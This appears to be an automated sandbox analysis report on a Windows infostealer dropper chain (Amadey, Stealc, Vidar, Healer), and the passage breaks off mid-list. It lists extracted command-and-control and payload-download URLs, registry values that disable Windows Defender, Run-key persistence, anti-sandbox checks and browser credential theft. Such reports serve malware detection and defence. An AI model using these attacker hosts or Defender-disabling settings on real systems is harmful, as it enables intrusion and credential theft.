Analysis
-
max time kernel
125s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
25/03/2025, 12:39
Static task
static1
Behavioral task
behavioral1
Sample
cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe
Resource
win10v2004-20250314-en
General
-
Target
cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe
-
Size
5.5MB
-
MD5
a1e237b0a0be86a206bdad00fdf9c888
-
SHA1
a22650c86fa1d919ffc36522cb078c218754328a
-
SHA256
cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74
-
SHA512
74fda918107ea7b82c24d9609f1b63e7be1c04f2c61fadcf4b2a213f05af1c731eb52f7aaf5d5fc8de3edde5f3a22f1db7c1db2be5294629682f9de6c7c2a7b4
-
SSDEEP
98304:hlQ5HXyIqLaRLRdNBRq955rw+q1idWNjQ++dhuMK/hzluSzcUrxr91Ba29KEvSa8:85jqKfqW1isNVhzlcSJLjg
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detect Vidar Stealer 2 IoCs
resource yara_rule behavioral1/memory/560-3105-0x0000000000400000-0x0000000000860000-memory.dmp family_vidar_v7 behavioral1/memory/560-9742-0x0000000000400000-0x0000000000860000-memory.dmp family_vidar_v7 -
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/8132-2855-0x0000000000D40000-0x00000000011A2000-memory.dmp healer behavioral1/memory/8132-2854-0x0000000000D40000-0x00000000011A2000-memory.dmp healer behavioral1/memory/8132-2925-0x0000000000D40000-0x00000000011A2000-memory.dmp healer -
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" 3315e253e7.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 3315e253e7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 3315e253e7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" 3315e253e7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 3315e253e7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 3315e253e7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 3315e253e7.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 3315e253e7.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications 3315e253e7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" 3315e253e7.exe -
Stealc family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 3540 created 3564 3540 qWvzIGs.exe 56 -
Vidar family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e74503e17b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2de910537b.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 2C5168.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1626bd4685.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3315e253e7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1k62M0.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3d01I.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 074cc99761.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1ee60c3a9f.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 1bd80d47f7.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 153 5064 powershell.exe 205 2840 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 5064 powershell.exe 2840 powershell.exe 6740 powershell.exe 5688 powershell.exe 2356 powershell.exe 5336 powershell.exe -
Downloads MZ/PE file 19 IoCs
flow pid Process 40 4924 rapes.exe 40 4924 rapes.exe 40 4924 rapes.exe 40 4924 rapes.exe 40 4924 rapes.exe 184 4504 3d01I.exe 184 4504 3d01I.exe 184 4504 3d01I.exe 184 4504 3d01I.exe 184 4504 3d01I.exe 184 4504 3d01I.exe 293 4924 rapes.exe 293 4924 rapes.exe 293 4924 rapes.exe 469 4924 rapes.exe 367 4924 rapes.exe 153 5064 powershell.exe 205 2840 powershell.exe 491 4924 rapes.exe -
Uses browser remote debugging 2 TTPs 18 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 5372 chrome.exe 7588 chrome.exe 3672 chrome.exe 2856 chrome.exe 7600 chrome.exe 7724 chrome.exe 3120 msedge.exe 3948 chrome.exe 4236 chrome.exe 2328 msedge.exe 5080 msedge.exe 7200 chrome.exe 8164 chrome.exe 6692 msedge.exe 1112 msedge.exe 3588 msedge.exe 4100 msedge.exe 2128 msedge.exe -
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3d01I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1ee60c3a9f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1bd80d47f7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2de910537b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3d01I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1626bd4685.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 074cc99761.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1ee60c3a9f.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1bd80d47f7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2C5168.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 074cc99761.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1k62M0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3315e253e7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e74503e17b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2C5168.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3315e253e7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e74503e17b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1k62M0.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1626bd4685.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2de910537b.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Checks computer location settings 2 TTPs 6 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 1ee60c3a9f.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation zx4PJh6.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation 1k62M0.exe Key value queried \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation rapes.exe -
Executes dropped EXE 27 IoCs
pid Process 5576 g0t53.exe 3788 1k62M0.exe 4924 rapes.exe 5040 2C5168.exe 4504 3d01I.exe 3540 qWvzIGs.exe 1968 eb95445557.exe 6540 1626bd4685.exe 4844 TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE 6372 074cc99761.exe 6924 483d2fa8a0d53818306efeb32d3.exe 6244 3d6d3eafb1.exe 8132 3315e253e7.exe 3572 rapes.exe 236 U0nqzpy.exe 560 1ee60c3a9f.exe 7132 1bd80d47f7.exe 4932 9a2efe8a79.exe 7476 2de910537b.exe 2836 e74503e17b.exe 3332 svchost015.exe 6168 U0nqzpy.exe 5068 svchost015.exe 916 tK0oYx3.exe 5064 OkH8IPF.exe 436 rapes.exe 5188 zx4PJh6.exe -
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 1k62M0.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 2C5168.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 1ee60c3a9f.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine e74503e17b.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 3d01I.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 1626bd4685.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 3315e253e7.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 1bd80d47f7.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 074cc99761.exe Key opened \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Software\Wine 2de910537b.exe -
Loads dropped DLL 2 IoCs
pid Process 4504 3d01I.exe 4504 3d01I.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 3315e253e7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 3315e253e7.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" g0t53.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\eb95445557.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331670101\\eb95445557.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331680121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1626bd4685.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331690101\\1626bd4685.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\074cc99761.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331700101\\074cc99761.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3d6d3eafb1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331710101\\3d6d3eafb1.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3315e253e7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10331720101\\3315e253e7.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 3 IoCs
description ioc Process File opened for modification C:\Users\Public\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Admin\Documents\desktop.ini firefox.exe File opened for modification C:\Users\Public\desktop.ini firefox.exe -
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x0008000000024335-129.dat autoit_exe behavioral1/files/0x00060000000229c8-2063.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3276 tasklist.exe 4292 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid Process 3788 1k62M0.exe 4924 rapes.exe 5040 2C5168.exe 4504 3d01I.exe 6540 1626bd4685.exe 4844 TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE 6372 074cc99761.exe 6924 483d2fa8a0d53818306efeb32d3.exe 8132 3315e253e7.exe 3572 rapes.exe 560 1ee60c3a9f.exe 7132 1bd80d47f7.exe 7476 2de910537b.exe 2836 e74503e17b.exe 436 rapes.exe -
Suspicious use of SetThreadContext 6 IoCs
description pid Process procid_target PID 3540 set thread context of 2536 3540 qWvzIGs.exe 139 PID 4932 set thread context of 8140 4932 9a2efe8a79.exe 202 PID 7476 set thread context of 3332 7476 2de910537b.exe 221 PID 2836 set thread context of 5068 2836 e74503e17b.exe 223 PID 916 set thread context of 5004 916 tK0oYx3.exe 229 PID 5064 set thread context of 7120 5064 OkH8IPF.exe 232 -
Drops file in Windows directory 8 IoCs
description ioc Process File opened for modification C:\Windows\InvestingTr zx4PJh6.exe File opened for modification C:\Windows\CylinderPair zx4PJh6.exe File created C:\Windows\Tasks\rapes.job 1k62M0.exe File opened for modification C:\Windows\VancouverPulse zx4PJh6.exe File opened for modification C:\Windows\GuaranteesFear zx4PJh6.exe File opened for modification C:\Windows\OfficeForbes zx4PJh6.exe File opened for modification C:\Windows\NecessityInfections zx4PJh6.exe File opened for modification C:\Windows\SheDrum zx4PJh6.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 56 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AppLaunch.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3315e253e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 074cc99761.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 3d6d3eafb1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language U0nqzpy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1bd80d47f7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cb4c35d17136af65b4eff25120bf21b1ef857d985f50ec4f015de008629fdf74.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3d01I.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3d6d3eafb1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2de910537b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e74503e17b.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eb95445557.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language U0nqzpy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MSBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 3d6d3eafb1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2C5168.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1626bd4685.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ee60c3a9f.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language g0t53.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1k62M0.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qWvzIGs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zx4PJh6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempFMFCLPNRSP4WUXKG741LUF6T3DG17CLO.EXE -
Checks processor information in registry 2 TTPs 28 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 1ee60c3a9f.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 3d01I.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 1ee60c3a9f.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 3d01I.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 7048 timeout.exe 5296 timeout.exe -
Enumerates system info in registry 2 TTPs 12 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried 